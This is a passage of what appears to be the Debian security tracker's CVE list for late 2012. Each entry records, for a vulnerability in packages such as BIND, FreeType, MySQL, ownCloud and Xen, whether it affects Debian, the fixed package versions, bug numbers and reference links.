CVE-2012-5703 (The vSphere API in VMware ESXi 4.1 and ESX 4.1 allows remote attackers ...)
	NOT-FOR-US: VMware ESXi
CVE-2012-5702
	RESERVED
CVE-2012-5701
	RESERVED
CVE-2012-5700
	RESERVED
CVE-2012-5699
	RESERVED
CVE-2012-5698
	RESERVED
CVE-2012-5979
	REJECTED
CVE-2012-5697
	RESERVED
CVE-2012-5696
	RESERVED
CVE-2012-5695
	RESERVED
CVE-2012-5694
	RESERVED
CVE-2012-5693
	RESERVED
CVE-2012-5692 (Unspecified vulnerability in admin/sources/base/core.php in Invision ...)
	NOT-FOR-US: Invision Power Board
CVE-2012-5691 (Buffer overflow in RealNetworks RealPlayer before 16.0.0.282 and ...)
	NOT-FOR-US: RealPlayer
CVE-2012-5690 (RealNetworks RealPlayer before 16.0.0.282 and RealPlayer SP 1.0 ...)
	NOT-FOR-US: RealPlayer
CVE-2012-5689 (ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain ...)
	- bind9 1:9.8.4.dfsg.P1-6+nmu1 (bug #699145)
	[squeeze] - bind9 (Only affects Bind 9.8 and 9.9)
	- isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp)
CVE-2012-5688 (ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 ...)
	- bind9 1:9.8.4.dfsg.P1-1 (bug #695192)
	[squeeze] - bind9 (Only affects 9.8 and 9.9)
	- isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp)
CVE-2012-5687 (Directory traversal vulnerability in the web-based management feature ...)
	NOT-FOR-US: TP-LINK TL-WR841N router
CVE-2012-5686
	RESERVED
CVE-2012-5685
	RESERVED
CVE-2012-5684
	RESERVED
CVE-2012-5683
	RESERVED
CVE-2012-5682
	RESERVED
CVE-2012-5681
	RESERVED
CVE-2012-5680 (Buffer overflow in Adobe Photoshop Camera Raw before 7.3 allows ...)
	NOT-FOR-US: Adobe Photoshop Camera Raw
CVE-2012-5679 (Buffer underflow in Adobe Photoshop Camera Raw before 7.3 allows ...)
	NOT-FOR-US: Adobe Photoshop Camera Raw
CVE-2012-5678 (Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-5677 (Integer overflow in Adobe Flash Player before 10.3.183.48 and 11.x ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-5676 (Buffer overflow in Adobe Flash Player before 10.3.183.48 and 11.x ...)
	NOT-FOR-US: Adobe Flash
CVE-2012-5675 (Adobe ColdFusion 9.0 through 9.0.2, and 10, allows local users to ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2012-5674 (Unspecified vulnerability in Adobe ColdFusion 10 before Update 5, when ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2012-5673 (Unspecified vulnerability in Adobe Flash Player before 10.3.183.29 and ...)
	NOT-FOR-US: Adobe Flash Player
CVE-2011-5235 (SQL injection vulnerability in mnoGoSearch before 3.3.12 allows remote ...)
	NOT-FOR-US: mnoGoSearch
CVE-2011-5234 (SQL injection vulnerability in user.php in Social Network Community 2 ...)
	NOT-FOR-US: Social Network Community
CVE-2011-5233 (Heap-based buffer overflow in IrfanView before 4.32 allows remote ...)
	NOT-FOR-US: IrfanView
CVE-2011-5232
	REJECTED
CVE-2011-5231
	REJECTED
CVE-2011-5230 (Multiple SQL injection vulnerabilities in the selectUserIdByLoginPass ...)
	NOT-FOR-US: Seotoaster
CVE-2011-5229 (SQL injection vulnerability in quickstart/profile/index.php in the ...)
	NOT-FOR-US: appRain CMF
CVE-2011-5228 (Cross-site scripting (XSS) vulnerability in the Search module ...)
	NOT-FOR-US: appRain CMF
CVE-2011-5227 (Stack-based buffer overflow in the Syslog service (nssyslogd.exe) in ...)
	NOT-FOR-US: Enterasys Network Management Suite
CVE-2011-5226 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: WordPress plugin Sentinel
CVE-2011-5225 (Cross-site scripting (XSS) vulnerability in wordpress_sentinel.php in ...)
	NOT-FOR-US: WordPress plugin Sentinel
CVE-2011-5224 (SQL injection vulnerability in the Sentinel plugin 1.0.0 for WordPress ...)
	NOT-FOR-US: WordPress plugin Sentinel
CVE-2011-5223 (Cross-site request forgery (CSRF) vulnerability in logout.php in Cacti ...)
	- cacti 0.8.7i-1
CVE-2011-5222 (SQL injection vulnerability in rub2_w.php in PHP Flirt-Projekt 4.8 and ...)
	NOT-FOR-US: PHP Flirt-Projekt
CVE-2011-5221 (Cross-site scripting (XSS) vulnerability in the getLog function in ...)
	- websvn 2.3.1-1
CVE-2011-5220 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: PHP-SCMS
CVE-2011-5219 (Directory traversal vulnerability in examples/show_code.php in mPDF ...)
	NOT-FOR-US: mPDF
CVE-2011-5218 (SQL injection vulnerability in DotA OpenStats 1.3.9 and earlier allows ...)
	NOT-FOR-US: DotA OpenStats
CVE-2011-5217 (Directory traversal vulnerability in the PXE Mtftp service in Hitachi ...)
	NOT-FOR-US: Hitachi JP1/ServerConductor/DeploymentManager
CVE-2011-5216 (SQL injection vulnerability in ajax.php in SCORM Cloud For WordPress ...)
	NOT-FOR-US: WordPress plugin SCORM Cloud
CVE-2011-5215 (SQL injection vulnerability in index.php in Video Community Portal ...)
	NOT-FOR-US: Video Community Portal
CVE-2011-5214 (Multiple cross-site scripting (XSS) vulnerabilities in BrowserCRM ...)
	NOT-FOR-US: BrowserCRM
CVE-2011-5213 (Multiple SQL injection vulnerabilities in BrowserCRM 5.100.01 and ...)
	NOT-FOR-US: BrowserCRM
CVE-2012-5672 (Microsoft Excel Viewer (aka Xlview.exe) and Excel in Microsoft Office ...)
	NOT-FOR-US: Microsoft Office
CVE-2012-5671 (Heap-based buffer overflow in the dkim_exim_query_dns_txt function in ...)
	{DSA-2566-1}
	- exim4 4.80-5.1 (medium)
CVE-2012-5670 (The _bdf_parse_glyphs function in FreeType before 2.4.11 allows ...)
	- freetype 2.4.9-1.1 (bug #696691)
	[squeeze] - freetype (Version in Squeeze doesn't parse alternative encoding format yet)
	NOTE: https://savannah.nongnu.org/bugs/?37907
	NOTE: http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=7f2e4f4f553f6836be7683f66226afac3fa979b8
CVE-2012-5669 (The _bdf_parse_glyphs function in FreeType before 2.4.11 allows ...)
	- freetype 2.4.9-1.1 (unimportant; bug #696691)
	NOTE: https://savannah.nongnu.org/bugs/?37906
	NOTE: http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=07bdb6e289c7954e2a533039dc93c1c136099d2d
CVE-2012-5668 (FreeType before 2.4.11 allows context-dependent attackers to cause a ...)
	- freetype 2.4.9-1.1 (unimportant; bug #696691)
	NOTE: https://savannah.nongnu.org/bugs/?37905
	NOTE: http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=9b6b5754b57c12b820e01305eb69b8863a161e5a
CVE-2012-5667 (Multiple integer overflows in GNU Grep before 2.11 might allow ...)
	- grep 2.11-1 (bug #701897)
	NOTE: https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1091473
	NOTE: patch http://git.savannah.gnu.org/cgit/grep.git/commit/?id=cbbc1a45b9f843c811905c97c90a5d31f8e6c189
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/22/1
CVE-2012-5666 (Cross-site scripting (XSS) vulnerability in bookmarks/js/bookmarks.js ...)
	- owncloud 4.0.8debian-1.3 (bug #696574)
	[wheezy] - owncloud 4.0.4debian2-3.2
CVE-2012-5665 (ownCloud 4.0.x before 4.0.10 and 4.5.x before 4.5.5 does not properly ...)
	- owncloud 4.0.8debian-1.3 (bug #696574)
	[wheezy] - owncloud 4.0.4debian2-3.2
CVE-2012-5664
	REJECTED
CVE-2012-5663
	RESERVED
	NOT-FOR-US: Isearch
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/21/1
CVE-2012-5662
	RESERVED
	- ibm-3270 (bug #706547)
	[wheezy] - ibm-3270 (Non-free not supported)
	[squeeze] - ibm-3270 (Non-free not supported)
CVE-2012-5661
	REJECTED
CVE-2012-5660 (abrt-action-install-debuginfo in Automatic Bug Reporting Tool (ABRT) ...)
	NOT-FOR-US: abrt is Red Hat / Fedora specific
CVE-2012-5659 (Untrusted search path vulnerability in ...)
	NOT-FOR-US: abrt is Red Hat / Fedora specific
CVE-2012-5658 (rhc-chk.rb in Red Hat OpenShift Origin before 1.1, when -d (debug ...)
	NOT-FOR-US: OpenShift
CVE-2012-5657 (The (1) Zend_Feed_Rss and (2) Zend_Feed_Atom classes in Zend_Feed in ...)
	{DSA-2602-1}
	- zendframework 1.11.13-1.1 (bug #696483)
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/20/2
	NOTE: http://framework.zend.com/security/advisory/ZF2012-05
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=889037
	NOTE: http://secunia.com/advisories/51583
CVE-2012-5656 (The rasterization process in Inkscape before 0.48.4 allows local users ...)
	- inkscape 0.48.3.1-1.2 (bug #696485)
CVE-2012-5655 (The Context module 6.x-3.x before 6.x-3.1 and 7.x-3.x before ...)
	NOT-FOR-US: Context module for Drupal
CVE-2012-5654 (The Nodewords: D6 Meta Tags module before 6.x-1.14 for Drupal, when ...)
	NOT-FOR-US: Nodewords: D6 Meta Tags module for Drupal
CVE-2012-5653 (The file upload feature in Drupal 6.x before 6.27 and 7.x before 7.18 ...)
	- drupal6 (bug #696343)
	- drupal7 7.14-1.2 (bug #696342)
	NOTE: http://drupal.org/SA-CORE-2012-004
CVE-2012-5652 (Drupal 6.x before 6.27 allows remote attackers to obtain sensitive ...)
	- drupal6 (bug #696343)
	NOTE: http://drupal.org/SA-CORE-2012-004
CVE-2012-5651 (Drupal 6.x before 6.27 and 7.x before 7.18 displays information for ...)
	- drupal6 (bug #696343)
	- drupal7 7.14-1.2 (bug #696342)
	NOTE: http://drupal.org/SA-CORE-2012-004
CVE-2012-5650 [DOM based XSS via Futon UI]
	RESERVED
	- couchdb 1.2.0-5 (bug #698439)
CVE-2012-5649 [JSONP arbitrary code execution with Adobe Flash]
	RESERVED
	- couchdb 1.2.0-5 (bug #698439)
CVE-2012-5648
	RESERVED
CVE-2012-5647 (Open redirect vulnerability in node-util/www/html/restorer.php in Red ...)
	NOT-FOR-US: OpenShift
CVE-2012-5646 (node-util/www/html/restorer.php in the Red Hat OpenShift Origin before ...)
	NOT-FOR-US: OpenShift
CVE-2012-5645
	RESERVED
	- freeciv (low; bug #696306)
	[squeeze] - freeciv (Minor issue)
	[wheezy] - freeciv (Minor issue)
CVE-2012-5644 [(Complete) Information disclosure when moving user's home directory]
	RESERVED
	- libuser (low; bug #705690)
	[wheezy] - libuser (Minor issue)
	[squeeze] - libuser (Minor issue)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=885724#c7
CVE-2012-5643 (Multiple memory leaks in tools/cachemgr.cc in cachemgr.cgi in Squid ...)
	{DSA-2631-1}
	- squid 2.7.STABLE9-2
	NOTE: squid-cgi was removed in 2.7.STABLE9-2
	- squid3 3.1.20-2.1 (bug #696187)
	NOTE: possible regression, see #701123
CVE-2012-5642 (server/action.py in Fail2ban before 0.8.8 does not properly handle the ...)
	- fail2ban 0.8.6-3wheezy1 (low; bug #696184)
	[squeeze] - fail2ban (Introduced in 0.8.6, see #696187)
CVE-2012-5641
	RESERVED
	- couchdb (Only affects CouchDB on Windows)
CVE-2012-5640 [thttpd: Local DoS vulnerability]
	RESERVED
	- thttpd (low)
	[squeeze] - thttpd (Minor issue)
CVE-2012-5639
	RESERVED
	- libreoffice (low)
	[wheezy] - libreoffice (Minor issue)
	- openoffice.org 1:3.3.0-1 (low)
	[squeeze] - openoffice.org (Minor issue)
	NOTE: Since 3.3.0 openoffice.org is a transitional source package
	NOTE: https://bugs.freedesktop.org/show_bug.cgi?id=58295
CVE-2012-5638 (The setup_logging function in log.h in SANLock uses world-writable ...)
	- sanlock 2.2-2 (bug #696424)
CVE-2012-5637
	RESERVED
CVE-2012-5636
	RESERVED
CVE-2012-5635 (The GlusterFS functionality in Red Hat Storage Management Console 2.0, ...)
	- glusterfs (bug #704944)
CVE-2012-5634 (Xen 4.2.x, 4.1.x, and 4.0, when using Intel VT-d for PCI passthrough, ...)
	{DSA-2636-1}
	- xen 4.1.3-8 (low)
CVE-2012-5633 (The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2012-5632
	RESERVED
CVE-2012-5631
	RESERVED
	NOT-FOR-US: FreeIPA
CVE-2012-5630 [TOCTOU race conditions by copying and removing directory trees]
	RESERVED
	- libuser (low; bug #705690)
	[wheezy] - libuser (Minor issue)
	[squeeze] - libuser (Minor issue)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=884685#c31
CVE-2012-5629 (The default configuration of the (1) LdapLoginModule and (2) ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2012-5628
	RESERVED
	NOT-FOR-US: gofer component of PULP project
CVE-2012-5627 [Insecure salt value usage when in the same mysql session]
	RESERVED
	- mysql-5.1 (low)
	- mysql-5.5 (low)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=883719
CVE-2012-5626
	RESERVED
CVE-2012-5625 (OpenStack Compute (Nova) Folsom before 2012.2.2 and Grizzly, when ...)
	- nova (Only affects OpenStack Folsom, bug #695830)
CVE-2012-5624 (The XMLHttpRequest object in Qt before 4.8.4 enables http redirection ...)
	- qt4-x11 4:4.8.2+dfsg-7 (bug #695156)
	[squeeze] - qt4-x11 (Vulnerable code not present)
	NOTE: http://lists.qt-project.org/pipermail/announce/2012-November/000014.html
CVE-2012-5623
	RESERVED
	NOT-FOR-US: change_passwd plugin for Squirrelmail
CVE-2012-5622 (Cross-site request forgery (CSRF) vulnerability in the management ...)
	NOT-FOR-US: OpenShift
CVE-2012-5621 [Ekiga (x < 4.0.0): DoS (crash) after receiving a call from another party whose name is not valid UTF-8]
	RESERVED
	- ekiga 3.2.7-6 (bug #702282; low)
	[squeeze] - ekiga (Minor issue)
CVE-2012-5620
	RESERVED
	NOT-FOR-US: Dovecot non-issue, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=695138#15
CVE-2012-5619
	RESERVED
	- sleuthkit (unimportant; bug #695097)
	NOTE: Hardly a vulnerability
CVE-2012-5618
	RESERVED
	NOT-FOR-US: Ushahidi
CVE-2012-5617 [privilege escalation due to improper authentication settings in policykit configuration file]
	RESERVED
	- gksu-polkit (bug #695807)
	NOTE: http://www.openwall.com/lists/oss-security/2012/12/12/8
CVE-2012-5616 (Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly ...)
	NOT-FOR-US: CloudStack
CVE-2012-5615 (MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, ...)
	- mysql-5.1 (low; bug #695001)
	- mysql-5.5 (low; bug #695001)
	NOTE: https://mariadb.atlassian.net/browse/MDEV-3909
	NOTE: http://seclists.org/fulldisclosure/2012/Dec/9
CVE-2012-5614 (Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB ...)
	- mysql-5.5 5.5.30+dfsg-1 (low; bug #695001)
	- mysql-5.1
	NOTE: https://mariadb.atlassian.net/browse/MDEV-3910
	NOTE: http://seclists.org/fulldisclosure/2012/Dec/7
CVE-2012-5613 (** DISPUTED ** ...)
	- mysql-5.1 (unimportant; bug #695001)
	- mysql-5.5 (unimportant; bug #695001)
	NOTE: Disputed as incorrect configuration
	NOTE: http://seclists.org/fulldisclosure/2012/Dec/6
CVE-2012-5612 (Heap-based buffer overflow in Oracle MySQL 5.5.19 and other versions ...)
	- mysql-5.1 (MDL was introduced in 5.5)
	- mysql-5.5 5.5.29+dfsg-1 (bug #695001)
	NOTE: https://mariadb.atlassian.net/browse/MDEV-3908
CVE-2012-5611 (Stack-based buffer overflow in the acl_get function in Oracle MySQL ...)
	{DSA-2581-1}
	- mysql-5.1 (bug #695001)
	- mysql-5.5 5.5.29+dfsg-1 (bug #695001)
	NOTE: http://seclists.org/fulldisclosure/2012/Dec/4
CVE-2012-5610 (Incomplete blacklist vulnerability in lib/filesystem.php in ownCloud ...)
	- owncloud 4.0.8debian-1.1 (bug #693990)
	[wheezy] - owncloud 4.0.4debian2-3.1
	NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2
CVE-2012-5609 (Incomplete blacklist vulnerability in lib/migrate.php in ownCloud ...)
	- owncloud 4.0.8debian-1.1 (bug #693990)
	[wheezy] - owncloud 4.0.4debian2-3.1
	NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2
CVE-2012-5608 (Cross-site scripting (XSS) vulnerability in ...)
	- owncloud 4.0.8debian-1.1 (bug #693990)
	[wheezy] - owncloud 4.0.4debian2-3.1
	NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2
CVE-2012-5607 (The "Lost Password" reset functionality in ownCloud before 4.0.9 and ...)
	- owncloud 4.0.8debian-1.1 (bug #693990)
	[wheezy] - owncloud 4.0.4debian2-3.1
	NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2
CVE-2012-5606 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...)
	- owncloud 4.0.8debian-1.1 (bug #693990)
	[wheezy] - owncloud 4.0.4debian2-3.1
	NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2
CVE-2012-5605 (Grinder in Red Hat CloudForms before 1.1 uses world-writable ...)
	NOT-FOR-US: Red Hat CloudForms
CVE-2012-5604 (The ldap_fluff gem for Ruby, as used in Red Hat CloudFroms 1.1, when ...)
	NOT-FOR-US: Red Hat CloudForms
CVE-2012-5603 (proxies_controller.rb in Katello in Red Hat CloudForms before 1.1 does ...)
	NOT-FOR-US: Red Hat CloudForms
CVE-2012-5602
	REJECTED
CVE-2012-5601
	REJECTED
CVE-2012-5600
	REJECTED
CVE-2012-5599
	REJECTED
CVE-2012-5598
	REJECTED
CVE-2012-5597
	REJECTED
CVE-2012-5596
	REJECTED
CVE-2012-5595
	REJECTED
CVE-2012-5594
	REJECTED
CVE-2012-5593
	REJECTED
CVE-2012-5592
	REJECTED
CVE-2012-5591 (Cross-site scripting (XSS) vulnerability in the Zero Point module ...)
	NOT-FOR-US: Drupal Zero Point module
CVE-2012-5590 (SQL injection vulnerability in the Webmail Plus module for Drupal ...)
	NOT-FOR-US: Drupal Webmail Plus module
CVE-2012-5589 (The MultiLink module 6.x-2.x before 6.x-2.7 and 7.x-2.x before 7.x-2.7 ...)
	NOT-FOR-US: Drupal MultiLink module
CVE-2012-5588 (The Email Field module 6.x-1.x before 6.x-1.3 for Drupal, when using a ...)
	NOT-FOR-US: Drupal Email Field module
CVE-2012-5587 (Cross-site scripting (XSS) vulnerability in the Email Field module ...)
	NOT-FOR-US: Drupal Email Field module
CVE-2012-5586 (The Services module 6.x-3.x before 6.x-3.3 and 7.x-3.x before 7.x-3.3 ...)
	NOT-FOR-US: Drupal Services module
CVE-2012-5585 (Cross-site scripting (XSS) vulnerability in the Mixpanel module ...)
	NOT-FOR-US: Drupal Mixpanel module
CVE-2012-5584 (The Table of Contents module 6.x-3.x before 6.x-3.8 for Drupal does ...)
	NOT-FOR-US: Drupal Table of Contents module
CVE-2012-5583 [phpcas curl usage]
	RESERVED
	- php-cas 1.3.1-2
	- moodle
	[wheezy] - moodle 2.2.3.dfsg-2.6~wheezy1
	NOTE: https://github.com/Jasig/phpCAS/pull/58
CVE-2012-5582 [opendnssec curl usage]
	RESERVED
	- opendnssec (eppclient not built in Debian package)
	NOTE: http://lists.opendnssec.org/pipermail/opendnssec-user/2012-November/002296.html
CVE-2012-5581 (Stack-based buffer overflow in tif_dir.c in LibTIFF before 4.0.2 ...)
	{DSA-2589-1}
	- tiff 4.0.2-1 (bug #694693)
	- tiff3 3.9.6-10
	NOTE: http://www.openwall.com/lists/oss-security/2012/11/28/1
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=867235
CVE-2012-5580 [libproxy: format string issue]
	RESERVED
	- libproxy 0.3.1-4 (low)
	[squeeze] - libproxy (Minor issue)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=791086
	NOTE: https://code.google.com/p/libproxy/source/detail?r=475
CVE-2012-5579
	REJECTED
CVE-2012-5578 [Python keyring insecure permissions on new databases]
	RESERVED
	- python-keyring 0.9.2-1.1 (bug #696736)
	[wheezy] - python-keyring 0.7.1-1+deb7u1
CVE-2012-5577 [Python keyring insecure permissions on migrated files]
	RESERVED
	- python-keyring 0.9.2-1.1 (bug #696736)
	[wheezy] - python-keyring 0.7.1-1+deb7u1
CVE-2012-5576 (Multiple stack-based buffer overflows in file-xwd.c in the X Window ...)
	- gimp 2.8.2-2 (bug #693977)
	NOTE: Upstream fix http://git.gnome.org/browse/gimp/commit/?id=2873262fccba12af144ed96ed91be144d92ff2e1
	NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=687392
	NOTE: http://www.openwall.com/lists/oss-security/2012/11/21/2
CVE-2012-5575
	RESERVED
	NOT-FOR-US: Apache CXF
CVE-2012-5574 (lib/form/sfForm.class.php in Symfony CMS before 1.4.20 allows remote ...)
	NOT-FOR-US: Symfony
CVE-2012-5573 (The connection_edge_process_relay_cell function in or/relay.c in Tor ...)
	- tor 0.2.3.25-1 (low)
	[squeeze] - tor (Minor issue)
CVE-2012-5572 [Dancer::Cookie: Cookie name CRLF injection]
	RESERVED
	- libdancer-perl (low; bug #694279)
	NOTE: https://github.com/PerlDancer/Dancer/issues/859
CVE-2012-5571 (OpenStack Keystone Essex (2012.1) and Folsom (2012.2) does not ...)
	- keystone 2012.1.1-11 (bug #694433)
CVE-2012-5570
	RESERVED
CVE-2012-5569 (Multiple cross-site scripting (XSS) vulnerabilities in the Basic ...)
	NOT-FOR-US: Drupal Webmail module
CVE-2012-5568 (Apache Tomcat through 7.0.x allows remote attackers to cause a denial ...)
	- tomcat6 (low)
	[squeeze] - tomcat6 (Minor issue)
	[wheezy] - tomcat6 (Minor issue)
	- tomcat7 (low)
	[wheezy] - tomcat7 (Minor issue)
CVE-2012-5567
	RESERVED
	- kronolith2 (Vulnerable code not present in 2.x codebase and later versions not yet packaged in sid)
CVE-2012-5566
	RESERVED
	- kronolith2 (Vulnerable code not present in 2.x codebase and later versions not yet packaged in sid)
CVE-2012-5565
	RESERVED
	NOT-FOR-US: This doesn't seem to be packaged in sid's Horde and the imp3 and dimp1 packages from stable do not include the affected code
CVE-2012-5564 (android-tools 4.1.1 in Android Debug Bridge (ADB) allows local users ...)
	- android-tools (bug #688280)
CVE-2012-5563 (OpenStack Keystone, as used in OpenStack Folsom 2012.2, does not ...)
	- keystone (Folsom branch not packaged yet)
CVE-2012-5562
	RESERVED
CVE-2012-5561 (script/katello-generate-passphrase in Katello 1.1 uses world-readable ...)
	NOT-FOR-US: Katello
CVE-2012-5560
	RESERVED
	NOT-FOR-US: MATE gnome fork
CVE-2012-5559 (Cross-site scripting (XSS) vulnerability in the page manager node view ...)
	NOT-FOR-US: Drupal chaos tool addon
CVE-2012-5558
	RESERVED
CVE-2012-5557 (The User Read-Only module 6.x-1.x before 6.x-1.4 and 7.x-1.x before ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5556 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5555
	RESERVED
CVE-2012-5554 (The default configuration for the Webform CiviCRM Integration module ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5553 (Multiple cross-site scripting (XSS) vulnerabilities in the OM Maximenu ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5552 (The Password policy module 6.x-1.x before 6.x-1.5 and 7.x-1.x before ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5551 (Multiple cross-site scripting (XSS) vulnerabilities in the MailChimp ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5550 (SQL injection vulnerability in the Time Spent module 6.x and 7.x for ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5549 (Cross-site request forgery (CSRF) vulnerability in the Time Spent ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5548 (Cross-site scripting (XSS) vulnerability in the Time Spent module 6.x ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5547 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5546
	RESERVED
CVE-2012-5545 (Multiple cross-site scripting (XSS) vulnerabilities in the ShareThis ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5544 (The Mandrill module 7.x-1.x before 7.x-1.2 for Drupal allows remote ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5543 (The Feeds module 7.x-2.x before 7.x-2.0-alpha6 for Drupal, when a ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5542 (Cross-site request forgery (CSRF) vulnerability in the Commerce Extra ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5541 (Cross-site scripting (XSS) vulnerability in the Twitter Pull module ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5540 (Multiple cross-site scripting (XSS) vulnerabilities in the Hostip ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5539 (The Organic Groups (OG) module 7.x-1.x before 7.x-1.5 for Drupal does ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5538 (Cross-site scripting (XSS) vulnerability in the FileField Sources ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5537 (The Simplenews Scheduler module 6.x-2.x before 6.x-2.4 for Drupal ...)
	NOT-FOR-US: Drupal contributed-module
CVE-2012-5536 (A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat ...)
	NOT-FOR-US: Red Hat-specific packaging flaw
CVE-2012-5535
	RESERVED
	- gnome-system-log (Fedora-specific issue)
CVE-2012-5534 (The hook_process function in the plugin API for WeeChat 0.3.0 through ...)
	{DSA-2598-1}
	- weechat 0.3.9.2-1
	[wheezy] - weechat 0.3.8-1+deb7u1
CVE-2012-5533 (The http_request_split_value function in request.c in lighttpd before ...)
	- lighttpd 1.4.31-2
	[squeeze] - lighttpd (Introduced in 1.4.31)
CVE-2012-5532 (The main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as ...)
	- linux (unimportant)
	- linux-2.6 (userspace daemon not yet present)
	NOTE: hyperv tools are not built in sid
CVE-2012-5531 (Multiple cross-site scripting (XSS) vulnerabilities in the GateIn ...)
	NOT-FOR-US: GateIn Portal
CVE-2012-5530 (The (1) pcmd and (2) pmlogger init scripts in Performance Co-Pilot ...)
	- pcp 3.7.1 (bug #698735; low)
	NOTE: first package in unstable is 3.7.1 (package has no debian revision)
	[squeeze] - pcp (Minor issue)
CVE-2012-5529 (TraceManager in Firebird 2.5.0 and 2.5.1, when trace is enabled, ...)
	{DSA-2648-1}
	- firebird2.5 2.5.2~svn+54698.ds4-2 (low; bug #693210)
	- firebird2.1 (Only affects 2.5.x)
CVE-2012-5528
	RESERVED
CVE-2012-5527
	RESERVED
	- claws-mail-extra-plugins 3.8.1-2 (unimportant; bug #693391)
	NOTE: More of a plain bug than a security vulnerability
CVE-2012-5526 (CGI.pm module before 3.63 for Perl does not properly escape newlines ...)
	{DSA-2587-1 DSA-2586-1}
	- perl 5.14.2-16 (bug #693420)
	- libcgi-pm-perl 3.61-2 (bug #693421)
	NOTE: http://cpansearch.perl.org/src/MARKSTOS/CGI.pm-3.63/Changes
	NOTE: https://github.com/markstos/CGI.pm/pull/23
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=877015
CVE-2012-5525 (The get_page_from_gfn hypercall function in Xen 4.2 allows local PV ...)
	- xen (Only affects Xen 4.2 and xen-unstable)
CVE-2012-5524
	RESERVED
	- gajim (low; bug #693282)
	[wheezy] - gajim (Minor issue)
	[squeeze] - gajim (Minor issue)
CVE-2012-5523 (core/email_api.php in MantisBT before 1.2.12 does not properly manage ...)
	- mantis 1.2.11-1.2 (bug #693283)
	NOTE: http://www.mantisbt.org/bugs/view.php?id=14704
CVE-2012-5522 (MantisBT before 1.2.12 does not use an expected default value during ...)
	- mantis 1.2.11-1.2 (bug #693283)
	NOTE: http://www.mantisbt.org/bugs/view.php?id=14496
CVE-2012-5521
	RESERVED
	- quagga (bug #693102)
CVE-2012-5520 (The send_to_sourcefire function in manage_sql.c in OpenVAS Manager 3.x ...)
	NOT-FOR-US: OpenVAS Manager
CVE-2012-5519 (CUPS 1.4.4, when running in certain Linux distributions such as Debian ...)
	{DSA-2600-1}
	- cups 1.5.3-2.7 (bug #692791)
	NOTE: http://seclists.org/oss-sec/2012/q4/253
CVE-2012-5518
	RESERVED
	NOT-FOR-US: ovirt / vsdm
CVE-2012-5517 (The online_pages function in mm/memory_hotplug.c in the Linux kernel ...)
	- linux 3.2.41-1
	- linux-2.6
	[squeeze] - linux-2.6 (Vulnerable code not present)
CVE-2012-5516 (Red Hat Enterprise Virtualization Manager (RHEV-M) before 3.1, when ...)
	NOT-FOR-US: Red Hat Enterprise Virtualisation Manager
CVE-2012-5515 (The (1) XENMEM_decrease_reservation, (2) XENMEM_populate_physmap, and ...)
	{DSA-2582-1}
	- xen 4.1.3-5
CVE-2012-5514 (The guest_physmap_mark_populate_on_demand function in Xen 4.2 and ...)
	{DSA-2582-1}
	- xen 4.1.3-6
CVE-2012-5513 (The XENMEM_exchange handler in Xen 4.2 and earlier does not properly ...)
	{DSA-2582-1}
	- xen 4.1.3-5
CVE-2012-5512 (Array index error in the HVMOP_set_mem_access handler in Xen 4.1 ...)
	- xen 4.1.3-5
